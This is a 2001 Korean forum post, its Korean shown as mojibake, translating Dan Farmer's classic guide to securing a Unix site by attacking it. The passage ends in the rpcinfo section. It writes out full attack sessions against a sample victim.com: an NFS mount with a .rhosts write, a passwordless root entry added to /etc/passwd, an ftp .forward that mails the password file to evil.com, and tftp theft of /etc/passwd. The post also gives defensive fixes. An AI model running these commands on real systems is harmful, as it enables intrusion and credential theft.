B / Y / U / S
HOME À¥ È£½ºÆà µµ¸ÞÀÎ ¸Å´º¾ó °í°´Áö¿ø ¼³Á¤Á¤º¸ °èÁ¤½Åû 2024-12-28 Saturday 
À¥ È£½ºÆÃ
# °øÁö »çÇ×
# ÀÚÁÖ ¹¯´Â Áú¹®
# Áú¹®°ú ´äº¯
# °¡ÀÔ ¹®ÀÇ
Ä¿¹Â´ÏƼ
# ÀÚÀ¯°Ô½ÃÆÇ
# ¸®´ª½ºÆÁ
# ¾ÆÀÌÅ¥ Å×½ºÆ®
# ³»È¨ ¼Ò°³
# °Ö·¯¸®
# ÀÚ·á½Ç

  ¸®´ª½ºÆÁ  Go Unix Power Tools Online Book Go Bash Guide
Read No. 26 article 2001-08-14 08:14:02
NickName   Ç®ºñ´©
Subject   ´ç½ÅÀÇ site¸¦ ħÀÔÀ¸·ÎºÎÅÍ º¸È£Çϱâ À§ÇÑ securityÀÇ °³¼±



´ç½ÅÀÇ site¸¦ ħÀÔÀ¸·ÎºÎÅÍ º¸È£Çϱâ À§ÇÑ securityÀÇ °³¼±

 

¡Ø ÀÌ ±ÛÀº Sun Microsystem ÀÇ Dan Farmer ÀÇ ±ÛÀ» ±âÃÊ·Î ¹ø¿ªÇÑ ±ÛÀÔ´Ï´Ù.


¡Ý µµÀÔ

 ¸ÅÀϸÅÀÏ Àü ¼¼°è¿¡¼­´Â ¼ö¸¹Àº Network hostµéÀÌ Ä§ÀÔ ´çÇÏ°í ÀÖ´Ù. ĨÀÔÀÚµéÀÇ °ø°Ý¼öÁØÀº ´Ù¾çÇѵ¥, °¡Àå ÀϹÝÀûÀÎ °ÍÀº Ãë¾àÇÑ Password¸¦ ÀÌ¿ëÇÏ´Â °ÍÀÌ´Ù. ±×¸®°í ¿äÁò¿¡´Â ²Ï ³ôÀº ¼öÁØÀÇ ±â¼úÀ» ±¸»çÇÏ´Â »ç¶÷µéµµ »ó´ç¼ö¿¡ À̸£°í ÀÖ´Ù. ÀÌ·± ħÀÔÀº ±× ÃßÀûÀÌ ¾î·Á¿ö¼­ ±× ±â¼ú¿¡ ´ëÇØ ¸¹ÀÌ ¾Ë·ÁÁø ¹Ù°¡ ¾ø´Ù.

 CERT, SRI, The Nic, NCSC. RSA. NASA. MIT. Uunet. Berkeley. Purdue. Sun. µîµî. ¿ì¸®´Â ÀÌ·± siteµéÀÌ Ä¨ÀÔ´çÇÑ °ÍÀ» º»ÀûÀÌ ÀÖ´Ù. ÀÎÅÍ³Ý »ó¿¡ ÀÖ´Â ¸¹Àº »çÀÌÆ®µé¿¡ ´ëÇØ Ä§ÀÔÀº ²Ï ½¬¿î °ÔÀÓÀ̶ó°í º¼ ¼öµµ ÀÖÀ» °ÍÀÌ´Ù. ÀÌ ¸ñÇ¥µéÀÌ ÀϹÝÀûÀÌÁö ¾ÊÀº°¡? ¹«½¼ ÀϵéÀÌ ¹ú¾îÁ³À»±î?

 »ó»óÇغ¸ÀÚ.
 ÇÑ ±Ý¹ßÀÇ ¼Ò³âÀÌ ¾îµÎ¿î ¹æ¿¡ ¾É¾Æ ÀÖ´Ù. ¹æ¿¡¼­ ³ª¿À´Â ºûÀ̶ó°í´Â ¿ÀÁ÷ ±×ÀÇ C64 40 character È­¸é»Ó. ´ã¹è¸¦ ÀÔ¿¡ ¹°°í ÀÌ ÁöÄ£ Cracker´Â ¶Ç ±×ÀÇ ¸®½ºÆ® »óÀÇ »õ·Î¿î ".mil" site¿¡ ÅÚ³ÝÀ¸·Î Á¢¼ÓÇÑ´Ù.
"guest-guest", "root-root", "system-manager" ¸ðµÎ ½ÇÆÐ.
»ó°ü¾ø´Ù. ±×´Â ¹ãÀ» »ø °Å´Ï±ñ. ±×´Â ¿¬ÇÊ·Î ¸®½ºÆ®¿¡¼­ ÀÌ »çÀÌÆ®¸¦ Áö¿ì°í, ¶Ç ÇÇ°ïÇÑ ¸öÀ¸·Î ´ÙÀ½ »çÀÌÆ®¿¡ Á¢¼ÓÇÑ´Ù.

 ¹¹, ÀÌ Á¤µµ°¡ ÀϹÝÀûÀÎ System crackerÀÇ À̹ÌÁö¶ó°í º¼ ¼ö ÀÖ°Ú´Ù. ÀÌ·± °æÇèÀÌ ºÎÁ·ÇÑ crackerµéÀº ÇÑ °³ÀÇ system ¿¡ µé¾î°¡±â À§ÇØ ¾öû³­ ½Ã°£À» ³¶ºñÇÏ¿©¾ß ÇÒ °ÍÀÌ´Ù. ±×·¯³ª ¼¼»ó¿¡´Â ÈξÀ ´õ ¹«¼­¿î ÇüÅÂÀÇ crackerµéÀÌ ÀÖ´Ù. ±×µéÀº ÃÖ½ÅÆÇ º¸¾È°Ë»ç ÇÁ·Î±×·¥°ú ¶Ç cracking toolÀ» ´Ù ¾Ë°í ÀÖ´Ù. ¶Ç ±×µéÀÌ Á÷Á¢ ¸¸µç ÇÁ·Î±×·¥À» ÀÌ¿ëÇϱ⵵ ÇÑ´Ù. ÃÖ±ÙÀÇ Security ÀÇ ±¸¸ÛÀ» ¾Ë°í ÀÖÀ» »Ó¸¸ ¾Æ´Ï¶ó, ±×µéÀÌ ±×·± ±¸¸Ûµé°ú ¹ö±×µéÀ» ¹ß°ßÇس»±âµµ ÇÑ´Ù. ¶ÇÇÑ ±×µéÀÌ µé¾î¿Ô´ø °æ·Î´Â ÈçÀû ¾øÀÌ »ç¶óÁø´Ù. À̵éÀÌ ¹Ù·Î "UeberCracker!"

 "UeberCracker"¶ó´Â ¸»Àº ´Ïü°¡ ¾´ "uebermensch"¿¡¼­ ³ª¿Ô´Ù. uebermensch´Â ¿µ¾î·Î ¹ø¿ªÇϸé "Over man"Âë µÇ´Âµ¥, Çѱ۷ΠÇϸé "½´ÆÛ Àΰ£"Á¤µµ°¡ µÇ°Ú´Ù. ´Ïü°¡ ¾´ ¶æÀº ±×³É ÀϹÝÀûÀÎ ¸¸È­ÀÇ ½´ÆÛ¸ÇÀÌ ¾Æ´Ï¶ó, º¸Åë Àΰ£ÀÇ ºÒ¿ÏÀüÇÔ°ú ¾àÇÔ µîÀ» ¶Ù¾î³ÑÀº »ç¶÷À» ¸»ÇÑ´Ù. ÀÌ·¸°Ô µÇ¸é Uebercracker°¡ ¿Ö uebercrackerÀÎÁö ¾Ë¾ÒÀ» °ÍÀÌ´Ù. ÀϹÝÀûÀÎ »·ÇÑ ¹æ¹ýÀ¸·Î systemÀ» ĨÀÔÇÏ·Á´Â cracker¸¦ ³Ñ¾î¼± cracker. ±×µéÀÇ ¸ñÇ¥´Â Á¤ÇØÁ® ÀÖ´Â °ÍÀÌ ¾Æ´Ï¶ó ¸ñÇ¥¿¡ µû¶ó º¯ÇÑ´Ù. µ·À» ¹ú±â À§Çؼ­¶ó´øÁö, ±×³É Å©°í À¯¸íÇÑ siteµé¿¡ ´ëÇÑ µµÀü. À̵éÀº Àâ±â Èûµé°í, µû¶ó¼­ ±×¸¸µÎ°Ô ÇÒ ¼öµµ ¾øÀ¸¸ç, ±×·¯¹Ç·Î ´ç½ÅÀÇ site°¡ ¾ÈÀüÇØ Áö´Â °Í¿¡ ´ëÇØ ÃÖ´ëÀÇ °É¸²µ¹ÀÌ µÉ °ÍÀÌ´Ù.

¡Ý Á¤º¸¸¦ ¾ò±â

 ½ÃÀÛÇϱâ Àü¿¡ ¿ì¼± ´ç½ÅÀÌ ´ç½ÅÀÇ site¸¦ º¸¾ÈÇÏ´Â ÀÔÀå¿¡¼­ victim.com À̶ó´Â ȸ»çÀÇ administrator¶ó°í ÇÏÀÚ. ´ç½ÅÀº ´ç½Åȸ»çÀÇ systemÀÇ º¸¾È Á¡°ËÀ» À§ÇØ ±×¸®°í ´ç½Å ±ÙóÀÇ Ä£ÇÑ system administratorÀÎ evil.com ¿¡°Ô ´ç½ÅÀÇ ±â°è¸¦ ħÀÔÀÚÀÇ ÀÔÀå¿¡¼­ º¸¾ÆÁÙ °ÍÀ» ºÎŹÇÒ °ÍÀÌ´Ù.

 °¡Àå ¸ÕÀú ÇØ¾ß ÇÒ °ÍÀº ¹«¾ùÀΰ¡? ¹¹´Ï¹¹´Ï Çصµ ¿ì¼±Àº ħÀÔÇÏ·Á´Â host¿¡ ´ëÇÑ Á¤º¸°¡ ÇÊ¿äÇÒ °ÍÀÌ´Ù. À̰͵éÀ» Á¦°øÇÏ´Â network service´Â ´ëÃæ ºÁµµ ¸¹Àºµ¥, finger, showmount, rpcinfo µîÀ¸·Î ½ÃÀÛÇÏ´Â °ÍÀÌ ÁÁ´Ù. ÇÏÁö¸¸ ±×°ÍÀ¸·Î ±×Ä¡Áö ¸»°í, DNS, whois, sendmail, ftp, uutp, µîµî ´Ù¸¥ ¸ðµç Á¤º¸¸¦ ¾òÀ» ¼ö ÀÖ´Â °ÍµéÀ» »ç¿ëÇØ¾ß ÇÑ´Ù. host¿¡¼­ ±×µéÀÇ °ø°£ ¸ðµÎ¸¦ º¸¿©ÁÖÁö ¸øÇÏ°Ô ¿øõ ºÀ¼âÇÏ´Â ¸¹Àº ¹æ¹ý°ú ±â¼úµéÀÌ ÀÖÁö¸¸, ¿ì¸®´Â ±×°ÍÀ» ¾Ë¾Æ³»±â À§ÇØ ¿ì¸®°¡ »ý°¢ÇÒ ¼ö ÀÖ´Â ¿©·¯ 'À§Ç轺·±' ÀÛÀüÀ» Á¶ÇÕÇÏ¿© ½ÃµµÇØ º¼ ¼ö ÀÖÀ» °ÍÀÌ´Ù. ÀÌ»óÀûÀ¸·Î ´ç½ÅÀÌ ¸ñÇ¥·Î »ïÀº ¸ðµç subnetÀÇ hostµé¿¡ ´ëÇÑ Á¤º¸¸¦ ¼öÁýÇØ¾ß ÇÑ´Ù. ÇѸ¶µð·Î "Á¤º¸´Â Èû"ÀÌ´Ù. ¿ì¼± ´ç½ÅÀÌ ¸ñÇ¥·Î »ï´Â victim.com¿¡ ´ëÇÑ Á¤º¸¸¦ ¸ð¾Æº¸±â·Î ÇÏÀÚ.

 ½ÃÀÛÀº ¸ÕÀú À¯ÀϹ«ÀÌÇÑ finger ¸í·ÉÀ» »ç¿ëÇÒ ¼ö ÀÖÀ» °ÍÀÌ´Ù.
 (¡ñ ´Ü À̶§ÀÇ ³¯Â¥´Â 1993³â 11¿ù 6ÀÏ, ½Ã°£Àº ¿ÀÈÄ 6½Ã¶ó°í °¡Á¤ÇÏÀÚ)

<pre> victim % finger @victim.com
[victim.com]
Login Name TTY Idle When Where
zen Dr. Fubar co 1d Wed 08:00 death.com
 </pre>

 GOOD! Áö±Ý ´Ü ÇÑ ¸íÀÇ idleÇÑ À¯Àú¹Û¿¡ ¾øÁö ¾ÊÀº°¡!. ´ç½ÅÀÌ Áö±ÝºÎÅÍ Ä§ÀÔÀ» ½ÃµµÇصµ ´«¿©°Üº¼ »ç¶÷ÀÌ ¾ø´Ù´Â °ÍÀÌ´Ù.

 ÀÌÁ¦ Á»´õ ±â¼úÀ» ¹ßÈÖÇغ¸ÀÚ. finger ½ÅºÀÀÚµé ¸ðµÎ fingering "@", "0", ""¸¦ ¾Ë °ÍÀÌ´Ù. ÀÌ°ÍÀ» »ç¿ëÇÏ¿© ÀϹÝÀûÀÎ À̸§µé. Áï root, bin, ftp, system, guest, demo, manager, µîµîÀ» °Ë»öÇغ¸ÀÚ. ²Ï ¸¹°í À¯¿ëÇÑ Á¤º¸µéÀÌ ³ª¿ÔÀ» °ÍÀÌ´Ù. ±× Áß¿¡¼­ ´« ¿©°Ü º¼¸¸ÇÑ Á¤º¸´Â ±×µéÀÇ À̸§°ú, home directory, ±×¸®°í ±×µéÀÌ ¸¶Áö¸·À¸·Î Á¢¼ÓÇÑ Àå¼ÒÀÌ´Ù.

 ÀÌ·± Á¤º¸¸¦ Ãß°¡Çϱâ À§ÇØ rusers ¸í·ÉÀ» »ç¿ëÇÒ ¼ö ÀÖÀ» °ÍÀÌ´Ù. (-l optionÀ» ºÙÀδÙ.)

 ÀÌ·¯ÇÑ ½Ãµµµé·Î ÀÎÇØ victim.com ¿¡ ´ëÇÏ¿© ´ÙÀ½°ú °°Àº »ç½ÇµéÀ» ¾Ë¾Æ³»¾ú´Ù.
 À̵éÀ» Ç¥·Î Á¤¸®ÇØ º¸¸é ¾Æ·¡¿Í °°´Ù.


<pre> Login Home-dir Shell Last login, from where ----- -------- ----- ---------------------- root / /bin/sh Fri Nov 5 07:42 on ttyp1 from big.victim.com bin /bin Never logged in nobody / Tue Jun 15 08:57 on ttyp2 from server.victim.com daemon / Tue Mar 23 12:14 on ttyp0 from big.victim.com sync / /bin/sync Tue Mar 23 12:14 on ttyp0 from big.victim.com zen /home/zen /bin/bash On since Wed Nov 6 on ttyp3 from death.com sam /home/sam /bin/csh Wed Nov 5 05:33 on ttyp3 from evil.com guest /export/foo /bin/sh Never logged in ftp /home/ftp Never logged in  </pre>

 ¿©·¯ cracking¿¡ °üÇÑ ½ÇÇè°á°ú finger´Â °¡Àå À§ÇèÇÑ network ¼­ºñ½º¶ó°í ÆÇ¸í³­ ÀûÀÌ ÀÖ´Ù. ÀÌ°ÍÀ̾߸»·Î ¸ñÇ¥¹°¿¡ ´ëÇÑ ¸Å¿ì À¯¿ëÇÑ Á¤º¸¸¦ °Åħ¾øÀÌ º¸¿©Áֱ⠶§¹®ÀÌ´Ù. ÇÏÁö¸¸ ÀÌ Á¤º¸¸¦ Á¦´ë·Î ÀÌ¿ëÇϱâ À§Çؼ­´Â ´Ù¸¥ Á¤º¸¿ÍÀÇ Á¶ÇÕÀÌ Áß¿äÇÏ´Ù.

 ¿¹¸¦ µé¾î ´ç½ÅÀÇ ¸ñÇ¥¹°¿¡ ´ëÇØ showmount¸¦ ½ÇÇàÇÏ¿© ´ÙÀ½°ú °°Àº Á¤º¸¸¦ ¾òÀ» ¼ö ÀÖ´Ù.

<pre> evil % showmount -e victim.com export list for victim.com: /export (everyone) /var (everyone) /usr easy /export/exec/kvm/sun4c.sunos.4.1.3 easy /export/root/easy easy /export/swap/easy easy  </pre>

 ¿©±â¼­ /export/foo ´Â ¹Ù±ùÀ¸·Î ¹æÃâµÈ´Ù´Â °ÍÀ» ¾Ë ¼ö ÀÖ´Ù. ±×¸®°í ¶ÇÇÑ À§¿¡¼­ ¾òÀº Á¤º¸¿¡¼­ ÀÌ°÷Àº guestÀÇ home directory ÀÌ´Ù.

 ÀÚ ÀÌÁ¦ ħÀÔÇÒ ½Ã°£ÀÌ µÇ¾ú´Ù.

 ÀÌ·± °æ¿ì¿¡ ´ç½ÅÀº ¸ÕÀú guestÀÇ home-directory¸¦ mount ÇÒ °ÍÀÌ´Ù. ´ç½ÅÀº locan machine¿¡ ÀÏÄ¡ÇÏ´Â °èÁ¤ÀÌ ¾ø°í, ¶Ç root´Â NFS mounted system¿¡ °üÇÑ fileµéÀ» ¼öÁ¤ÇÒ ¼ö ¾ø±â ¶§¹®¿¡ ´ç½ÅÀº ´ç½ÅÀÇ local password file¿¡ guest°èÁ¤À» »ý¼ºÇÒ ¼ö ÀÖ°Ô µÈ´Ù. guestÀÇ ÀÚ°ÝÀ¸·Î ´ç½ÅÀº .rhost¸¦ remote µÈ guest ÀÇ home-directory·Î ³Ö´Â´Ù. ±×·¯¸é ÀÌÁ¦ ¸ñÇ¥ machine ¿¡ passwordÀÇ °ø±Þ ¾øÀÌ loginÇÒ ¼ö ÀÖÀ» °ÍÀÌ´Ù.

<pre> evil # mount victim.com:/export/foo /foo evil # cd /foo evil # ls -lag total 3 1 drwxr-xr-x 11 root daemon 512 Jun 19 09:47 . 1 drwxr-xr-x 7 root wheel 512 Jul 19 1991 .. 1 drwx--x--x 9 10001 daemon 1024 Aug 3 15:49 guest evil # echo guest:x:10001:1:temporary breakin account:/: >> /etc/passwd evil # ls -lag total 3 1 drwxr-xr-x 11 root daemon 512 Jun 19 09:47 . 1 drwxr-xr-x 7 root wheel 512 Jul 19 1991 .. 1 drwx--x--x 9 guest daemon 1024 Aug 3 15:49 guest evil # su guest evil % echo evil.com >> guest/.rhosts evil % rlogin victim.com Welcome to victim.com! victim %  </pre>

 ¸¸ÀÏ home directory ´ë½Å¿¡ victim.com ÀÌ filesystemÀ» user command¿¡ ÀÇÇÏ¿© ¹æÃâÇÏ°íÀÖ¾ú´Ù¸é, ¸í·ÉµéÀ» ´ç½ÅÀÇ ¼±Åÿ¡ µû¶ó ½ÇÇàµÇ´Â 'Æ®·ÎÀÌ ¸ñ¸¶'·Î ±³Ã¼ÇÒ ¼ö ÀÖÀ» °ÍÀÌ´Ù. ±×·¯¸é ±× ´ÙÀ½¿¡ Á¢¼ÓÇÏ´Â À¯Àú°¡ ±× command¸¦ ½ÇÇàÇÒ ¶§ ´ç½ÅÀÇ command°¡ ½ÇÇàµÉ °ÍÀÌ´Ù.

 -> filesystem Àº ´ÙÀ½°ú °°ÀÌ ¹æÃâµÇ´Â °ÍÀ» ±ÇÀåÇÑ´Ù.

 Read/Write´Â Ưº°ÇÏ°í trust µÈ client¿¡°Ô.. °¡´ÉÇÑ ¸ðµç °ÍÀº Read only·Î.

 ¸¸ÀÏ targetÀÌ ±×ÀÇ /etc/hosts.equiv ¿¡ "+" ¿ÍÀϵå Ä«µå¸¦ °¡Áö°í Àְųª (±× Ç¥ÁØÀº ±â°è¿¡ µû¶ó ´Ù¸£´Ù.), netgroups bug¸¦ °¡Áö°í ÀÖ´Ù¸é root°¡ ¾Æ´Ñ ´Ù¸¥ ¸ðµç userµéÀÇ name°ú password·Î password ÇÊ¿ä ¾øÀÌ rloginÇÒ ¼ö ÀÖ´Ù. ±×¸®°í ¶§¶§·Î "bin"À̶ó´Â À¯Àú´Â key file°ú directory¸¦ °¡Áö°í Àֱ⠶§¹®¿¡ ´ç½ÅÀÇ ´ÙÀ½ ¸ñÇ¥´Â ÀÌÁ¦ host¿¡ Á¢¼ÓÇÏ¿© password file¸¦ Á¶ÀÛÇÏ°í ±×·ÎºÎÅÍ root ±ÇÇÑÀ» °¡Áö´Â °ÍÀÌ´Ù.

<pre> evil % whoami bin evil % rsh victim.com csh -i Warning: no access to tty; thus no job control in this shell... victim % ls -ldg /etc drwxr-sr-x 8 bin staff 2048 Jul 24 18:02 /etc victim % cd /etc victim % mv passwd pw.old victim % (echo toor::0:1:instant root shell:/:/bin/sh; cat pw.old ) > passwd victim % ^D evil % rlogin victim.com -l toor Welcome to victim.com! victim # </pre>

 À§¿¡¼­ "rsh victim.com csh -i" ´Â system¿¡ óÀ½ µé¾î°¥ ¶§ wtmp³ª utmp °°Àº ½Ã½ºÅÛ Á¡°Ë file¿¡ ÈçÀûÀ» ³²±âÁö ¾Ê±â À§ÇØ »ç¿ëµÇ¾ú´Ù. ÀÌ·¸°Ô Çϸé finger³ª who ¿¡ ´ëÇØ invisible ÇÏ°Ô µÈ´Ù. ÀÌ·± remote ½©Àº ±×°ÍÀÌ pseudo-terminal¿¡ ¿¬°áµÇ¾î ÀÖÁö ¾ÊÀ¸¹Ç·Î pagers³ª editors °°Àº Screen-oriented programÀ» »ç¿ëÇÒ ¼ö´Â ¾ø´Ù. ÇÏÁö¸¸ ¾î·µç ÀÌ°ÍÀº ªÀº Ž»ç¿¡ ¸Å¿ì À¯¿ëÇÏ´Ù.

 "The COPS" º¸¾È Á¡°Ë toolÀº key files ³ª directory°¡ ´Ù¸¥ superuserµé¿¡ ÀÇÇØ writingÀÌ °¡´ÉÇÑÁö¸¦ Á¡°ËÇÏ¿© ÁÙ °ÍÀÌ´Ù. ¶Ç ¸¸ÀÏ ´ç½ÅÀÌ SunOS 4.x ¹öÀüÀ» »ç¿ëÇÏ°í ÀÖ´Ù¸é patch 100103À» »ç¿ëÇÏ¿© ´ëºÎºÐ fileµéÀÇ ±ÇÇѹ®Á¦¸¦ ÇØ°áÇÒ ¼ö ÀÖ´Ù. ¸¹Àº system¿¡¼­ rsh´Â À§ ¿¡¼­¿Í °°ÀÌ ¼º°øÇÒ °æ¿ì ¿Ïº®ÇÏ°Ô ÈçÀûÀ» ³²±âÁö ¾ÊÀ» ¼ö ÀÖ´Ù. ÀÌ·± °æ¿ì¿¡´Â ¿¬°áµÇ¾î µé¾î¿À´Â °úÁ¤µéÀ» ±â·ÏÇØ ÁÖ´Â 'tcp wrapper' µîÀ» »ç¿ëÇÏ¿© ÀÌ·¯ÇÑ È°µ¿À» ³ëÃâ½Ãų ¼ö ÀÖ´Ù.

¡Ý Ftp¿Í Tftp

 ÀÚ ÀÌÁ¦ ´Ù¸¥ ¹æ¹ýµé¿¡ ´ëÇÏ¿© ¾Ë¾Æº¸ÀÚ. À§¿¡ ¼Ò°³µÈ ¹æ¹ýµé·Î ´ç½ÅÀº ¸ñÇ¥ÇÑ hostµé¿¡ ´ëÇØ ½±°Ô ħÀÔÇÒ ¼ö ÀÖ¾ú´Â°¡? ¾Æ¸¶ ±×·¸Áö ¾Ê¾ÒÀ» °ÍÀÌ´Ù. ÀÌÁ¦ ´ç½ÅÀÌ Ã³À½ Á¤º¸¸¦ Á¶»çÇÒ »óȲÀ¸·Î µÇµ¹¾Æ°¡ º¸ÀÚ. ¾Æ¸¶ "ftp"¶ó´Â °èÁ¤ÀÌ ÀÖ¾úÀ½À» ±â¾ïÇÒ °ÍÀÌ´Ù. ÀÌ°ÍÀº º¸Åë Anonymous ftp°¡ °¡´ÉÇÔÀ» ÀǹÌÇÏ´Â °ÍÀÌ´Ù. anonymous ftp´Â access¸¦ ¾ò±â À§ÇÑ ½¬¿î ¹æ¹ýÀÓ°ú µ¿½Ã¿¡ Á¾Á¾ À߸ø °ü¸®µÇ¾î Àֱ⵵ ÇÏ´Ù.

 ¿¹¸¦ µé¾î ¸ñÇ¥¹°Àº /etc/passwd ÆÄÀÏÀÇ »çº»À» anonymous ftp ÀÇ ~ftp/etc µð·ºÅ丮¿¡ º¸°üÇÏ´Â °æ¿ìµµ ÀÖ´Ù. ÀÌ·± °æ¿ì victim.com ÀÇ ftp home-directory´Â writableÇϹǷΠ´ç½ÅÀº ¸í·ÉµéÀ» remote ÇÏ°Ô ½ÇÇà½Ãų ¼ö ÀÖ´Ù. password fileÀ» ´ç½Å¿¡°Ô·Î mailing ÇÏ´Â ¹æ¹ýÀÌ À¯È¿Çѵ¥. °£´ÜÇÑ .forward fileÀ» ¸¸µé¾î¼­ ftp°èÁ¤¿¡ mailÀÌ º¸³»¾îÁú ¶§¸¶´Ù ¸í·ÉÀ» ½ÇÇàÇÏ°Ô ÇÏ¸é µÈ´Ù.

<pre> evil % cat forward_sucker_file "|/bin/mail zen at evil.com < /etc/passwd" evil % ftp victim.com Connected to victim.com 220 victim FTP server ready. Name (victim.com:zen): ftp 331 Guest login ok, send ident as password. Password: 230 Guest login ok, access restrictions apply. ftp> ls -lga 200 PORT command successful. 150 ASCII data connection for /bin/ls (192.192.192.1,1129) (0 bytes). total 5 drwxr-xr-x 4 101 1 512 Jun 20 1991 . drwxr-xr-x 4 101 1 512 Jun 20 1991 .. drwxr-xr-x 2 0 1 512 Jun 20 1991 bin drwxr-xr-x 2 0 1 512 Jun 20 1991 etc drwxr-xr-x 3 101 1 512 Aug 22 1991 pub 226 ASCII Transfer complete. 242 bytes received in 0.066 seconds (3.6 Kbytes/s) ftp> put forward_sucker_file .forward 43 bytes sent in 0.0015 seconds (28 Kbytes/s) ftp> quit evil % echo test | mail ftp at victim.com  </pre>

 ÀÌÁ¦ password fileÀÌ ´ç½Å¿¡°Ô ³¯¾Æ¿À´Â °ÍÀ» ±â´Ù¸®´Â Àϸ¸ ³²¾Ò´Ù.

 COPS toolÀº ´ç½ÅÀÇ anonymous ftp ¼³Á¤ÀÌ ¸Â´ÂÁö Á¡°ËÇÏ¿© ÁÙ °ÍÀÌ´Ù.
 ftpd¿¡ ´ëÇÑ man ÆäÀÌÁö¸¦ ¿­¾îº¸°Å³ª, COPS ¶Ç´Â CERT advisory 93:10 ¿¡ ´ëÇÑ ¹®¼­³ª Äڵ带 Àо¸é ¾î¶»°Ô anonymous ftp¸¦ ¼³Á¤ÇØ¾ß Çϴ°¡¿¡ ´ëÇÑ Á¤º¸¸¦ ¾òÀ» ¼ö ÀÖÀ» °ÍÀÌ´Ù. ftp°¡ ħÀÔ ¹Þ±â ½¬¿î ÀÌÀ¯´Â À߸øµÈ Owner °ü°è³ª, key file¿¡ ´ëÇÑ ±ÇÇÑ ¼³Á¤ÀÌ À߸øµÇ¾î Àִµ¥ ÀÖ´Ù. Àû¾îµµ ÃÖ¼ÒÇÑ ~ftp¿Í ¸ðµç "system" µð·ºÅ丮¿Í ÆÄÀϵéÀº ~ftp ¹Ø¿¡ µÎ°í, root¼ÒÀ¯·Î ÇÑ ´ÙÀ½ ¾î¶² user¿¡°Ôµµ ¾²±â ±ÇÇÑÀ» Á־´Â ¾È µÈ´Ù.


 ftp¸¦ Á»´õ »ìÆ캸¸é ÀÚÁÖ ¾Ç¿ëµÇ´Â ¿À·¡µÈ ¹ö±×°¡ Çϳª ÀÖ´Ù.

<pre> ftp> open victim.com Connected to victim.com 220 victim.com FTP server ready. ftp> quote user ftp 331 Guest login ok, send ident as password. ftp> quote cwd ~root 530 Please login with USER and PASS. ftp> quote pass ftp 230 Guest login ok, access restrictions apply. ftp> ls -al / (or whatever) </pre>

 ¸¸ÀÏ ÀÌ°ÍÀÌ ¸ÔÇû´Ù¸é, ´ç½ÅÀº Áö±Ý root·Î½á ·Î±äµÈ °ÍÀÌ´Ù. µû¶ó¼­ password file¸¦ ¸¶À½¸ÔÀº´ë·Î Á¶ÀÛÇÒ ¼ö°¡ ÀÖ´Ù. ¸¸ÀÏ ´ç½ÅÀÇ system ¿¡ ÀÌ°ÍÀÌ °É·Áµç´Ù¸é ´ç½ÅÀº ¹Ù·Î ftpd daemonÀ» ´ç½ÅÀÇ vendor ³ª ftp.uu.netÀ¸·ÎºÎÅÍ ¾÷µ¥ÀÌÆ® ÇÏ¿©¾ß ÇÑ´Ù.

 ¸¶Áö¸·À¸·Î ftp¿Í Èí»çÇÑ °ÍÀ¸·Î tftp°¡ ÀÖ´Ù. ÀÌ°ÍÀº trivial file transfer system ÀÇ ¾àÀÚ·Î Áï ¸»±×´ë·Î ÀÛÀº ÆÄÀϵéÀ» Àü¼ÛÇϱâ À§ÇÑ °ÍÀÌ´Ù. ÀÌ daemonÀº ¾î¶² passwordµµ ÇÊ¿ä·Î ÇÏÁö ¾Ê´Â´Ù. ¸¸ÀÏ host°¡ tftp¿¡ ´ëÇÏ¿© access Á¦ÇÑÀ» µÎÁö ¾Ê´Â´Ù¸é (ÀÌ Á¦ÇÑÀº ÁÖ·Î inetd.conf file ÀÇ flag setÀ» ÀÌ¿ëÇÏ¿© ¼³Á¤µÈ´Ù) °ø°ÝÀÚ´Â ½Ã½ºÅÛ ÀÌ°÷Àú°÷À» read/write ÇÒ ¼ö ÀÖ´Ù. Áï ´ç½ÅÀº password fileÀ» ´ç½ÅÀÇ /tmp µð·ºÅ丮·Î °¡Á®´Ù ³õÀ» ¼ö ÀÖ´Â °ÍÀÌ´Ù.

<pre> evil % tftp tftp> connect victim.com tftp> get /etc/passwd /tmp/passwd.victim tftp> quit  </pre>

 º¸¾ÈÀÇ °üÁ¡¿¡¼­ º¼ ¶§ tftp´Â »ç¿ëµÇ¾î¼­´Â ¾È µÈ´Ù. ¸¸¾à¿¡ tftp°¡ ²À ÇÊ¿äÇÏ´Ù¸é °¡Ä¡ ÀÖ´Â Á¤º¸°¡ ºüÁ®³ª°¥ ¼ö ¾ø°Ô ditectoryµî¿¡ secure option/flag¸¦ ÀÌ¿ëÇÏ¿© Á¦ÇÑÀ» µÎ¾î¾ß ÇÑ´Ù. ¾Æ´Ï¸é tftp¸¦ "chroot wrapper" ÇÁ·Î±×·¥ ÇÏ¿¡¼­ µ¹¾Æ°¡°Ô µÎ¾î¾ß ÇÑ´Ù.

¡ÝRPCinfo ¿Í sendmail

 ¸¸ÀÏ ÀÌÀüÀÇ ¹æ¹ýµéÀÌ ¸ÔÇôµéÁö ¾Ê¾Ò´Ù¸é, ÀÌÁ¦ Á»´õ ¸Í·ÄÇÑ °ø°ÝÀ» ÆÛºÎÀ» ¶§°¡ µÇ¾ú´Ù. ´ç½ÅÀº rpcinfo ¶ó´Â Ä£±¸¸¦ °¡Áö°í ÀÖÀ¸¸ç ÀÌ°Í ¿ª½Ã ¸Å¿ì À¯¿ëÇÑ ÇÁ·Î±×·¥ÀÌ´Ù. ¾î¼¸é ÀÌ°ÍÀÌ finger º¸´Ùµµ ´õ À¯¿ëÇÏ´Ù°í »ý°¢ÇÒ ¼öµµ ÀÖ´Ù. ¸¹Àº host¿¡¼­, ºÎ´çÇÏ°Ô ÀÌ¿ëµÉÁöµµ ¸ð¸£´Â RPC service¸¦ µ¹¸®°í ÀÖ´Ù. ÀÌ°ÍÀ» ÀÌ¿ëÇϸé Áö±Ý host°¡ NIS¸¦ µ¹¸®°í ÀÖ´ÂÁö, ±×°ÍÀÌ NIS serverÀÎÁö slaveÀÎÁö, ÁÖº¯¿¡ diskless workstationÀÌ ÀÖ´ÂÁö, ±×°ÍÀÌ NFSÇÏ¿¡¼­ µ¹¾Æ°¡´ÂÁö, ¶ÇÇÑ rusersd, rstatd µîÀÇ Á¤º¸µé°ú ´Ù¸¥ º¸¾È ÇÁ·Î±×·¥¿¡ ´ëÇÑ Á¤º¸µéÀ» ¾Ë ¼ö ÀÖÀ» °ÍÀÌ´Ù.

<pre> evil % rpcinfo -p victim.com [output trimmed for brevity's sake] program vers proto port 100004 2 tcp 673 ypserv 100005 1 udp 721 mountd 100003 2 udp 2049 nfs 100026 1 udp 733 bootparam 100017 1 tcp 1274 rexd </pre>

